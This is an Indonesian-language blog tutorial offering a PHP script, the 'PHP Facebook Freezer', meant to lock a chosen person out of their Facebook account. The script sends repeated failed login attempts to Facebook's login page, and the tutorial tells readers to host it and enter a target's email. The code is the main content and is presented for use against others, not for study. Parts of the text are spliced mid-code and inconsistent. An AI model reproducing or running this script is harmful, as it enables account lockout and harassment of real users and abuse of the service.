TUTORIAL HACK FACEBOOK
Tutorial hack facebook yang akan saya share disini memiliki fungsi sama persis dengan software hack facebook yaitu bikin beku / ga bisa buad login facebook seseorang , tapi ini versi webphp
hosting yang support php dan curl (jangan 000webhost)
dan Notepad

caranya mudah , copy script dibawah ini ke notepad :
<?setelah kamu berhasil mengkopi script untuk hack facebook diatas , kini saatnya untuk menyimpan dengan nama nomoredisk.Php
echo “<html><title>PHP Facebook Freezer</title><head><meta http-equiv=\”refresh\” content=\”600\”></head><body>”;
echo “<br><form method=post>Email : <input name=email><input type=submit value=Submit></form><br><br>”;
$email=$_POST['email'];
$passwd=’123′;
if(isset($email) && isset($passwd)){
$kue=”/tmp/”.rand().”.txt”;
$url=’https://login.facebook.com/login.php’;
$login=”email=$email&pass=$passwd&login=Log In”;
define(“_COK_”, $kue);
curlget($url);
for ($number=1; $number<=30; $number++) {
$data=curlpost($url,$login);
}
echo $data;
}
function curlget($url){
$agent=$_SERVER['HTTP_USER_AGENT'];
$curl=curl_init();
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_USERAGENT, $agent);
curl_setopt($curl, CURLOPT_RETURNTRANSFER ,1);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION ,1);
curl_setopt($curl, CURLOPT_ENCODING, “”);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_COOKIEFILE, _COK_);
curl_setopt($curl, CURLOPT_COOKIEJAR, _COK_);
$data = curl_exec($curl);
curl_close ($curl);
return $data;
}
function curlpost($url,$post){
$agent=$_SERVER['HTTP_USER_AGENT'];
$curl=curl_init();
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_USERAGENT, $agent);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
curl_setopt($curl, CURLOPT_ENCODING, “”);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION ,1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER ,1);
curl_setopt($curl, CURLOPT_COOKIEFILE, _COK_);
curl_setopt($curl, CURLOPT_COOKIEJAR, _COK_);
$data = curl_exec($curl);
curl_close ($curl);
return $data;
}
echo “</body></html>”;
?>
setelah itu kamu upload file Fb.Php ke hostinganmu yang suport curl dan php
nih contoh jadinya klik disini
klo file udah di upload kini tinggal main ………

buka file yang kamu upload tadi ex: http://wolimierz.org/images/nomoredisk.php
setelah itu masukan dah email target

Sumber :
KOMUNITAS PELAJAR ILMU KOMPUTER INDONESIA
http://mr-amateur.co.cc
http://www.hilmanpribadi.com